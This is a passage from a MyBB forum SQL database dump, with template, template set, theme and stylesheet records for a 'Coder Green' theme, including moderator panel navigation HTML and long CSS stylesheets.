id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr><!--modcp_achivements-->\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr>\n </tbody>\n</table>\n</td>', '1', '1608', '', '1350764104'); INSERT INTO mybb_templates VALUES('2070', 'modcp_nav', '<td width=\"{$lang->nav_width}\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$lang->nav_menu}</strong></td>\n </tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php\" class=\"modcp_nav_item modcp_nav_home\">{$lang->mcp_nav_home}</a></td></tr>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpforums\']}.gif\" id=\"modcpforums_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_forums}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpforums_e\']}\" id=\"modcpforums_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=announcements\" class=\"modcp_nav_item modcp_nav_announcements\">{$lang->mcp_nav_announcements}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modqueue\" class=\"modcp_nav_item modcp_nav_modqueue\">{$lang->mcp_nav_modqueue}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=reports\" class=\"modcp_nav_item modcp_nav_reports\">{$lang->mcp_nav_reported_posts}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=modlogs\" class=\"modcp_nav_item modcp_nav_modlogs\">{$lang->mcp_nav_modlogs}</a></td></tr>\n </tbody>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_right\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'modcpusers\']}.gif\" id=\"modcpusers_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->mcp_nav_users}</strong></span></div>\n </td>\n </tr>\n <tbody style=\"{$collapsed[\'modcpusers_e\']}\" id=\"modcpusers_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=finduser\" class=\"modcp_nav_item modcp_nav_editprofile\">{$lang->mcp_nav_editprofile}</a></td></tr><!--modcp_achivements-->\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=banning\" class=\"modcp_nav_item modcp_nav_banning\">{$lang->mcp_nav_banning}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=warninglogs\" class=\"modcp_nav_item modcp_nav_warninglogs\">{$lang->mcp_nav_warninglogs}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"modcp.php?action=ipsearch\" class=\"modcp_nav_item modcp_nav_ipsearch\">{$lang->mcp_nav_ipsearch}</a></td></tr>\n </tbody>\n</table>\n</td>', '8', '1608', '', '1350764104'); INSERT INTO mybb_templates VALUES('2071', 'achivements', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->achivements}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table width=\"100%\" border=\"0\" align=\"center\">\r\n<tr>\r\n<td valign=\"top\">\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\">\r\n<strong>{$lang->achivementsbyposts}</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->posts}</strong></td>\r\n<td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td>\r\n<td class=\"tcat\"><strong>{$lang->description}</strong></td>\r\n</tr>\r\n{$posts}\r\n</table>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\">\r\n<strong>{$lang->achivementsbythreads}</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->threads}</strong></td>\r\n<td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td>\r\n<td class=\"tcat\"><strong>{$lang->description}</strong></td>\r\n</tr>\r\n{$threads}\r\n</table>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\">\r\n<strong>{$lang->achivementsbyreputation}</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->reputation}</strong></td>\r\n<td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td>\r\n<td class=\"tcat\"><strong>{$lang->description}</strong></td>\r\n</tr>\r\n{$reputation}\r\n</table>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\">\r\n<strong>{$lang->achivementsbytimeonline}</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td>\r\n<td class=\"tcat\" width=\"15%\" align=\"center\"><strong>{$lang->timeonline}</strong></td>\r\n<td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td>\r\n<td class=\"tcat\"><strong>{$lang->description}</strong></td>\r\n</tr>\r\n{$timeonline}\r\n</table>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td class=\"thead\" colspan=\"4\">\r\n<strong>{$lang->achivementsbyregdate}</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"tcat\" width=\"10%\" align=\"center\"><strong>{$lang->image}</strong></td>\r\n<td class=\"tcat\" width=\"15%\" align=\"center\"><strong>{$lang->regdate}</strong></td>\r\n<td class=\"tcat\" width=\"20%\"><strong>{$lang->name}</strong></td>\r\n<td class=\"tcat\"><strong>{$lang->description}</strong></td>\r\n</tr>\r\n{$regdate}\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '-1', '1604', '', '1350790438'); INSERT INTO mybb_templates VALUES('2083', 'hideUntilPost_box', '<div style=\"background: #DA0000; text-align: left; margin-left: 15px; padding: 13px 20px 13px 45px; border-top: 2px solid #000000; border-bottom: 2px solid #000000; line-height: 150%; margin-top: 5px; margin-bottom: 5px;\">{$msg}</div>', '-1', '1608', '', '1350857795'); INSERT INTO mybb_templates VALUES('2084', 'codebuttons', '<script type=\"text/javascript\" src=\"jscripts/editor.js?ver=1608\"></script>\r\n<script type=\"text/javascript\">\r\n<!--\r\n {$editor_language}\r\n var clickableEditor = new messageEditor(\"{$bind}\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"});\r\n if(clickableEditor)\r\n {\r\n clickableEditor.bindSmilieInserter(\"clickable_smilies\");\r\n }\r\n// -->\r\n</script>', '8', '1608', '', '1350877781'); INSERT INTO mybb_templates VALUES('2085', 'multipage', '<div class=\"pagination\">\r\n<span class=\"pages\">{$lang->multipage_pages}</span>\r\n{$prevpage}{$start}{$mppage}{$end}{$nextpage}\r\n</div>', '8', '1608', '', '1350878341'); INSERT INTO mybb_templates VALUES('2086', 'multipage_breadcrumb', '<div id=\"breadcrumb_multipage_popup\" class=\"pagination pagination_breadcrumb\" style=\"display: none;\">\r\n{$prevpage}{$start}{$mppage}{$end}{$nextpage}\r\n</div>\r\n<script type=\"text/javascript\">\r\n// <!--\r\n if(use_xmlhttprequest == \"1\")\r\n {\r\n new PopupMenu(\"breadcrumb_multipage\");\r\n }\r\n// -->\r\n</script>', '8', '1608', '', '1350878623'); DROP TABLE IF EXISTS mybb_templatesets; CREATE TABLE mybb_templatesets ( sid smallint(5) unsigned NOT NULL auto_increment, title varchar(120) NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_templatesets VALUES('1', 'Default Templates'); INSERT INTO mybb_templatesets VALUES('8', 'Coder Green Templates'); DROP TABLE IF EXISTS mybb_themes; CREATE TABLE mybb_themes ( tid smallint(5) unsigned NOT NULL auto_increment, name varchar(100) NOT NULL, pid smallint(5) unsigned NOT NULL, def smallint(1) NOT NULL, properties text NOT NULL, stylesheets text NOT NULL, allowedgroups text NOT NULL, PRIMARY KEY (tid) ); INSERT INTO mybb_themes VALUES('1', 'MyBB Master Style', '0', '0', 'a:6:{s:11:\"templateset\";i:-2;s:6:\"imgdir\";s:6:\"images\";s:4:\"logo\";s:15:\"images/logo.gif\";s:10:\"tablespace\";s:1:\"4\";s:11:\"borderwidth\";s:1:\"1\";s:11:\"editortheme\";s:7:\"default\";}', 'a:8:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/global.css\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=3\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=4\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:20:\"css.php?stylesheet=4\";i:1;s:20:\"css.php?stylesheet=5\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/tabbed.css\";}}}', 'all'); INSERT INTO mybb_themes VALUES('2', 'Default', '1', '0', 'a:6:{s:11:\"templateset\";i:1;s:11:\"editortheme\";s:7:\"default\";s:6:\"imgdir\";s:6:\"images\";s:4:\"logo\";s:15:\"images/logo.gif\";s:10:\"tablespace\";i:4;s:11:\"borderwidth\";i:1;}', 'a:9:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/global.css\";}}s:9:\"inherited\";a:8:{s:13:\"global_global\";a:1:{s:30:\"cache/themes/theme1/global.css\";s:1:\"1\";}s:17:\"usercp.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:18:\"usercp2.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:18:\"private.php_global\";a:1:{s:20:\"css.php?stylesheet=2\";s:1:\"1\";}s:16:\"modcp.php_global\";a:1:{s:20:\"css.php?stylesheet=3\";s:1:\"1\";}s:23:\"forumdisplay.php_global\";a:1:{s:20:\"css.php?stylesheet=4\";s:1:\"1\";}s:21:\"showthread.php_global\";a:2:{s:20:\"css.php?stylesheet=4\";s:1:\"1\";s:20:\"css.php?stylesheet=5\";s:1:\"1\";}s:16:\"index.php_global\";a:1:{s:30:\"cache/themes/theme1/tabbed.css\";s:1:\"1\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=2\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=3\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:20:\"css.php?stylesheet=4\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:20:\"css.php?stylesheet=4\";i:1;s:20:\"css.php?stylesheet=5\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:30:\"cache/themes/theme1/tabbed.css\";}}}', '4'); INSERT INTO mybb_themes VALUES('10', 'Coder Green', '1', '1', 'a:6:{s:11:\"templateset\";i:8;s:11:\"editortheme\";s:7:\"default\";s:6:\"imgdir\";s:17:\"images/CoderGreen\";s:4:\"logo\";s:26:\"images/CoderGreen/logo.png\";s:10:\"tablespace\";i:4;s:11:\"borderwidth\";i:0;}', 'a:8:{s:6:\"global\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/global.css\";}}s:10:\"usercp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:11:\"usercp2.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:11:\"private.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/usercp.css\";}}s:9:\"modcp.php\";a:1:{s:6:\"global\";a:1:{i:0;s:21:\"css.php?stylesheet=32\";}}s:16:\"forumdisplay.php\";a:1:{s:6:\"global\";a:1:{i:0;s:21:\"css.php?stylesheet=33\";}}s:14:\"showthread.php\";a:1:{s:6:\"global\";a:2:{i:0;s:21:\"css.php?stylesheet=33\";i:1;s:21:\"css.php?stylesheet=34\";}}s:9:\"index.php\";a:1:{s:6:\"global\";a:1:{i:0;s:31:\"cache/themes/theme10/tabbed.css\";}}}', '4,9,6,3'); DROP TABLE IF EXISTS mybb_themestylesheets; CREATE TABLE mybb_themestylesheets ( sid int(10) unsigned NOT NULL auto_increment, name varchar(30) NOT NULL, tid int(10) unsigned NOT NULL, attachedto text NOT NULL, stylesheet text NOT NULL, cachefile varchar(100) NOT NULL, lastmodified bigint(30) NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_themestylesheets VALUES('1', 'global.css', '1', '', 'body {\n background: #efefef;\n color: #000;\n font-family: Verdana, Arial, Sans-Serif;\n font-size: 13px;\n text-align: center; /* IE 5 fix */\n line-height: 1.4;\n}\n\na:link {\n color: #026CB1;\n text-decoration: none;\n}\n\na:visited {\n color: #026CB1;\n text-decoration: none;\n}\n\na:hover, a:active {\n color: #000;\n text-decoration: underline;\n}\n\n#container {\n width: 95%;\n background: #fff;\n border: 1px solid #e4e4e4;\n color: #000000;\n margin: auto auto;\n padding: 20px;\n text-align: left; /* IE 5 fix */\n}\n\n#content {\n /* FIX: Make internet explorer wrap correctly */\n width: auto !important;\n\n}\n\n.menu ul {\n color: #000000;\n font-weight: bold;\n text-align: right;\n padding: 4px;\n}\n\n.menu ul a:link {\n color: #000000;\n text-decoration: none;\n}\n\n.menu ul a:visited {\n color: #000000;\n text-decoration: none;\n}\n\n.menu ul a:hover, .menu ul a:active {\n color: #4874a3;\n text-decoration: none;\n}\n\n#panel {\n background: #efefef;\n color: #000000;\n font-size: 11px;\n border: 1px solid #D4D4D4;\n padding: 8px;\n}\n\n#panel .remember_me input {\n vertical-align: middle;\n margin-top: -1px;\n}\n\ntable {\n color: #000000;\n font-family: Verdana, Arial, Sans-Serif;\n font-size: 13px;\n}\n\n.tborder {\n background: #81A2C4;\n width: 100%;\n margin: auto auto;\n border: 1px solid #0F5C8E;\n}\n\n.thead {\n background: #026CB1 url(images/thead_bg.gif) top left repeat-x;\n color: #ffffff;\n}\n\n.thead a:link {\n color: #ffffff;\n text-decoration: none;\n}\n\n.thead a:visited {\n color: #ffffff;\n text-decoration: none;\n}\n\n.thead a:hover, .thead a:active {\n color: #ffffff;\n text-decoration: underline;\n}\n\n.tcat {\n background: #ADCBE7;\n color: #000000;\n font-size: 12px;\n}\n\n.tcat a:link {\n color: #000000;\n}\n\n.tcat a:visited {\n color: #000000;\n}\n\n.tcat a:hover, .tcat a:active {\n color: #000000;\n}\n\n.trow1 {\n background: #f5f5f5;\n}\n\n.trow2 {\n background: #EFEFEF;\n}\n\n.trow_shaded {\n background: #ffdde0;\n}\n\n.trow_selected td {\n background: #FFFBD9;\n}\n\n.trow_sep {\n background: #e5e5e5;\n color: #000;\n font-size: 12px;\n font-weight: bold;\n}\n\n.tfoot {\n background: #026CB1 url(images/thead_bg.gif) top left repeat-x;\n color: #ffffff;\n}\n\n.tfoot a:link {\n color: #ffffff;\n text-decoration: none;\n}\n\n.tfoot a:visited {\n color: #ffffff;\n text-decoration: none;\n}\n\n.tfoot a:hover, .tfoot a:active {\n color: #ffffff;\n text-decoration: underline;\n}\n\n.bottommenu {\n background: #efefef;\n color: #000000;\n border: 1px solid #4874a3;\n padding: 10px;\n}\n\n.navigation {\n color: #000000;\n font-size: 13px;\n font-weight: bold;\n}\n\n.navigation a:link {\n text-decoration: none;\n}\n\n.navigation a:visited {\n text-decoration: none;\n}\n\n.navigation a:hover, .navigation a:active {\n text-decoration: none;\n}\n\n.navigation .active {\n color: #000000;\n font-size: 13px;\n font-weight: bold;\n}\n\n.smalltext {\n font-size: 11px;\n}\n\n.largetext {\n font-size: 16px;\n font-weight: bold;\n}\n\ninput.textbox {\n background: #ffffff;\n color: #000000;\n border: 1px solid #0f5c8e;\n padding: 1px;\n}\n\ntextarea {\n background: #ffffff;\n color: #000000;\n border: 1px solid #0f5c8e;\n padding: 2px;\n font-family: Verdana, Arial, Sans-Serif;\n line-height: 1.4;\n font-size: 13px;\n}\n\nselect {\n background: #ffffff;\n border: 1px solid #0f5c8e;\n}\n\n.editor {\n background: #f1f1f1;\n border: 1px solid #ccc;\n}\n\n.editor_control_bar {\n background: #fff;\n border: 1px solid #0f5c8e;\n}\n\n.autocomplete {\n background: #fff;\n border: 1px solid #000;\n color: black;\n}\n\n.autocomplete_selected {\n background: #adcee7;\n color: #000;\n}\n\n.popup_menu {\n background: #ccc;\n border: 1px solid #000;\n}\n\n.popup_menu .popup_item {\n background: #fff;\n color: #000;\n}\n\n.popup_menu .popup_item:hover {\n background: #C7DBEE;\n color: #000;\n}\n\n.trow_reputation_positive {\n background: #ccffcc;\n}\n\n.trow_reputation_negative {\n background: #ffcccc;\n}\n\n.reputation_positive {\n color: green;\n}\n\n.reputation_neutral {\n color: #444;\n}\n\n.reputation_negative {\n color: red;\n}\n\n.invalid_field {\n border: 1px solid #f30;\n color: #f30;\n}\n\n.valid_field {\n border: 1px solid #0c0;\n}\n\n.validation_error {\n background: url(images/invalid.gif) no-repeat center left;\n color: #f30;\n margin: 5px 0;\n padding: 5px;\n font-weight: bold;\n font-size: 11px;\n padding-left: 22px;\n}\n\n.validation_success {\n background: url(images/valid.gif) no-repeat center left;\n color: #00b200;\n margin: 5px 0;\n padding: 5px;\n font-weight: bold;\n font-size: 11px;\n padding-left: 22px;\n}\n\n.validation_loading {\n background: url(images/spinner.gif) no-repeat center left;\n color: #555;\n margin: 5px 0;\n padding: 5px;\n font-weight: bold;\n font-size: 11px;\n padding-left: 22px;\n}\n\n/* Additional CSS (Master) */\nimg {\n border: none;\n}\n\n.clear {\n clear: both;\n}\n\n.hidden {\n display: none;\n float: none;\n width: 1%;\n}\n\n.hiddenrow {\n display: none;\n}\n\n.selectall {\n background-color: #FFFBD9;\n font-weight: bold;\n text-align: center;\n}\n\n.float_left {\n float: left;\n}\n\n.float_right {\n float: right;\n}\n\n.menu ul {\n list-style: none;\n margin: 0;\n}\n\n.menu li {\n display: inline;\n padding-left: 5px;\n}\n\n.menu img {\n padding-right: 5px;\n vertical-align: top;\n}\n\n#panel .links {\n margin: 0;\n float: right;\n}\n\n.expcolimage {\n float: right;\n width: auto;\n vertical-align: middle;\n margin-top: 3px;\n}\n\nimg.attachment {\n border: 1px solid #E9E5D7;\n padding: 2px;\n}\n\nhr {\n background-color: #000000;\n color: #000000;\n height: 1px;\n border: 0px;\n}\n\n#copyright {\n font: 11px Verdana, Arial, Sans-Serif;\n margin: 0;\n padding: 10px 0 0 0;\n}\n\n#debug {\n float: right;\n text-align: right;\n margin-top: 0;\n}\n\nblockquote {\n border: 1px solid #ccc;\n margin: 0;\n background: #fff;\n padding: 4px;\n}\n\nblockquote cite {\n font-weight: bold;\n border-bottom: 1px solid #ccc;\n font-style: normal;\n display: block;\n margin: 4px 0;\n}\n\nblockquote cite span {\n float: right;\n font-weight: normal;\n}\n\nblockquote cite span.highlight {\n float: none;\n font-weight: bold;\n padding-bottom: 0;\n}\n\n.codeblock {\n background: #fff;\n border: 1px solid #ccc;\n padding: 4px;\n}\n\n.codeblock .title {\n border-bottom: 1px solid #ccc;\n font-weight: bold;\n margin: 4px 0;\n}\n\n.codeblock code {\n overflow: auto;\n height: auto;\n max-height: 200px;\n display: block;\n font-family: Monaco, Consolas, Courier, monospace;\n font-size: 13px;\n}\n\n.subforumicon {\n border: 0;\n vertical-align: middle;\n}\n\n.separator {\n margin: 5px;\n padding: 0;\n height: 0px;\n font-size: 1px;\n list-style-type: none;\n}\n\nform {\n margin: 0;\n padding: 0;\n}\n\n.popup_menu .popup_item_container {\n margin: 1px;\n text-align: left;\n}\n\n.popup_menu .popup_item {\n display: block;\n padding: 3px;\n text-decoration: none;\n white-space: nowrap;\n}\n\n.popup_menu a.popup_item:hover {\n text-decoration: none;\n}\n\n.autocomplete {\n text-align: left;\n}\n\n.subject_new {\n font-weight: bold;\n}\n\n.highlight {\n background: #FFFFCC;\n padding-top: 3px;\n padding-bottom: 3px;\n}\n\n.pm_alert {\n background: #FFF6BF;\n border: 1px solid #FFD324;\n text-align: center;\n padding: 5px 20px;\n margin-bottom: 15px;\n font-size: 11px;\n}\n\n.red_alert {\n background: #FBE3E4;\n border: 1px solid #A5161A;\n color: #A5161A;\n text-align: center;\n padding: 5px 20px;\n margin-bottom: 15px;\n font-size: 11px;\n}\n\n.high_warning {\n color: #CC0000;\n}\n\n.moderate_warning {\n color: #F3611B;\n}\n\n.low_warning {\n color: #AE5700;\n}\n\ndiv.error {\n padding: 5px 10px;\n border-top: 2px solid #FFD324;\n border-bottom: 2px solid #FFD324;\n background: #FFF6BF;\n font-size: 12px;\n}\n\ndiv.error p {\n margin: 0;\n color: #000;\n font-weight: normal;\n}\n\ndiv.error p em {\n font-style: normal;\n font-weight: bold;\n padding-left: 24px;\n display: block;\n color: #C00;\n background: url(\'images/error.gif\') no-repeat 0;\n}\n\ndiv.error ul {\n margin-left: 24px;\n}\n\n.online {\n color: #15A018;\n}\n\n.offline {\n color: #C7C7C7;\n}\n\n.pagination {\n font-size: 11px;\n padding-top: 10px;\n margin-bottom: 5px;\n}\n\n.tfoot .pagination, .tcat .pagination {\n padding-top: 0;\n}\n.pagination .pages {\n font-weight: bold;\n}\n\n.pagination .pagination_current, .pagination a {\n padding: 2px 6px;\n margin-bottom: 3px;\n}\n\n.pagination a {\n border: 1px solid #81A2C4;\n}\n\n.pagination .pagination_current {\n background: #F5F5F5;\n border: 1px solid #81A2C4;\n font-weight: bold;\n color: #000;\n}\n\n.pagination a:hover {\n background: #F5F5F5;\n text-decoration: none;\n}\n\n.thread_legend, .thread_legend dd {\n margin: 0;\n padding: 0;\n}\n\n.thread_legend dd {\n padding-bottom: 4px;\n margin-right: 15px;\n}\n\n.thread_legend img {\n margin-right: 4px;\n vertical-align: bottom;\n}\n\n.forum_legend, .forum_legend dt, .forum_legend dd {\n margin: 0;\n padding: 0;\n}\n\n.forum_legend dd {\n float: left;\n margin-right: 10px;\n}\n\n.forum_legend dt {\n margin-right: 10px;\n float: left;\n}\n\n.success_message {\n color: #00b200;\n font-weight: bold;\n font-size: 10px;\n margin-bottom: 10px;\n}\n\n.error_message {\n color: #C00;\n font-weight: bold;\n font-size: 10px;\n margin-bottom: 10px;\n}\n\n.post_body {\n padding: 5px;\n}\n\n.post_content {\n padding: 5px 10px;\n}\n\n.quick_jump {\n background: url(\'images/jump.gif\') no-repeat 0;\n width: 13px;\n height: 13px;\n padding-left: 13px; /* amount of padding needed for image to fully show */\n vertical-align: middle;\n border: none;\n}\n\n.repbox {\n font-size:16px;\n font-weight: bold;\n padding:5px 7px 5px 7px;\n}\n\n._neutral {\n background-color:#FAFAFA;\n color: #999999;\n border:1px solid #CCCCCC;\n}\n\n._minus {\n background-color: #FDD2D1;\n color: #CB0200;\n border:1px solid #980201;\n}\n\n._plus {\n background-color:#E8FCDC;\n color: #008800;\n border:1px solid #008800;\n}\n\n.pagination_breadcrumb {\n background-color: #f5f5f5;\n border: 1px solid #fff;\n outline: 1px solid #ccc;\n padding: 5px;\n margin-top: 5px;\n font-weight: normal;\n white-space: nowrap;\n}\n\n.pagination_breadcrumb_link {\n vertical-align: middle;\n cursor: pointer;\n}\n ', 'global.css', '1339729416'); INSERT INTO mybb_themestylesheets VALUES('2', 'usercp.css', '1', 'usercp.php|usercp2.php|private.php', '.usercp_nav_item {\n display: block;\n padding: 1px 0 1px 23px;\n}\n.usercp_nav_composepm {\n background: url(images/usercp/composepm.gif) no-repeat left center;\n}\n\n.usercp_nav_pmfolder {\n background: url(images/usercp/pmfolder.gif) no-repeat left center;\n}\n\n.usercp_nav_sub_pmfolder {\n padding-left: 40px;\n background: url(images/usercp/sub_pmfolder.gif) no-repeat left center;\n}\n\n.usercp_nav_trash_pmfolder {\n padding-left: 40px;\n background: url(images/usercp/trash_pmfolder.gif) no-repeat left center;\n}\n\n.usercp_nav_pmtracking {\n background: url(images/usercp/pmtracking.gif) no-repeat left center;\n}\n\n.usercp_nav_pmfolders {\n background: url(images/usercp/editfolders.gif) no-repeat left center;\n}\n\n.usercp_nav_profile {\n background: url(images/usercp/profile.gif) no-repeat left center;\n}\n\n.usercp_nav_email {\n padding-left: 40px;\n background: url(images/usercp/email.gif) no-repeat left center;\n}\n\n.usercp_nav_password {\n padding-left: 40px;\n background: url(images/usercp/password.gif) no-repeat left center;\n}\n\n.usercp_nav_username {\n padding-left: 40px;\n background: url(images/usercp/username.gif) no-repeat left center;\n}\n\n.usercp_nav_editsig {\n padding-left: 40px;\n background: url(images/usercp/editsig.gif) no-repeat left center;\n}\n\n.usercp_nav_avatar {\n padding-left: 40px;\n background: url(images/usercp/avatar.gif) no-repeat left center;\n}\n\n.usercp_nav_options {\n background: url(images/usercp/options.gif) no-repeat left center;\n}\n\n.usercp_nav_usergroups {\n background: url(images/usercp/usergroups.gif) no-repeat left center;\n}\n\n.usercp_nav_editlists {\n background: url(images/usercp/editlists.gif) no-repeat left center;\n}\n\n.usercp_nav_attachments {\n background: url(images/usercp/attachments.gif) no-repeat left center;\n}\n\n.usercp_nav_drafts {\n background: url(images/usercp/drafts.gif) no-repeat left center;\n}\n\n.usercp_nav_subscriptions {\n background: url(images/usercp/subscriptions.gif) no-repeat left center;\n}\n\n.usercp_nav_fsubscriptions {\n background: url(images/usercp/fsubscriptions.gif) no-repeat left center;\n}\n\n.usercp_nav_notepad {\n background: url(images/usercp/notepad.gif) no-repeat left center;\n}\n\n.usercp_nav_viewprofile {\n background: url(images/usercp/viewprofile.gif) no-repeat left center;\n}\n\n.usercp_nav_home {\n background: url(images/usercp/home.gif) no-repeat left center;\n}\n\n.usercp_notepad {\n width: 99%;\n}\n\n.usercp_container {\n margin: 5px;\n padding: 8px;\n border:1px solid #CCCCCC;\n}', 'usercp.css', '1340045122'); INSERT INTO mybb_themestylesheets VALUES('3', 'modcp.css', '1', 'modcp.php', '.modcp_nav_item {\n display: block;\n padding: 1px 0 1px 23px;\n}\n\n.modcp_nav_home {\n background: url(images/modcp/home.gif) no-repeat left center;\n}\n\n.modcp_nav_announcements {\n background: url(images/modcp/announcements.gif) no-repeat left center;\n}\n\n.modcp_nav_reports {\n background: url(images/modcp/reports.gif) no-repeat left center;\n}\n\n.modcp_nav_modqueue {\n background: url(images/modcp/modqueue.gif) no-repeat left center;\n}\n\n.modcp_nav_modlogs {\n background: url(images/modcp/modlogs.gif) no-repeat left center;\n}\n\n.modcp_nav_editprofile {\n background: url(images/modcp/editprofile.gif) no-repeat left center;\n}\n\n.modcp_nav_banning {\n background: url(images/modcp/banning.gif) no-repeat left center;\n}\n\n.modcp_nav_warninglogs {\n background: url(images/modcp/warninglogs.gif) no-repeat left center;\n}\n\n.modcp_nav_ipsearch {\n background: url(images/modcp/ipsearch.gif) no-repeat left center;\n}\n\n.modqueue_message {\n overflow: auto;\n max-height: 250px;\n}\n\n.modqueue_controls {\n width: 270px;\n float: right;\n text-align: center;\n border: 1px solid #ccc;\n background: #fff;\n padding: 6px;\n font-weight: 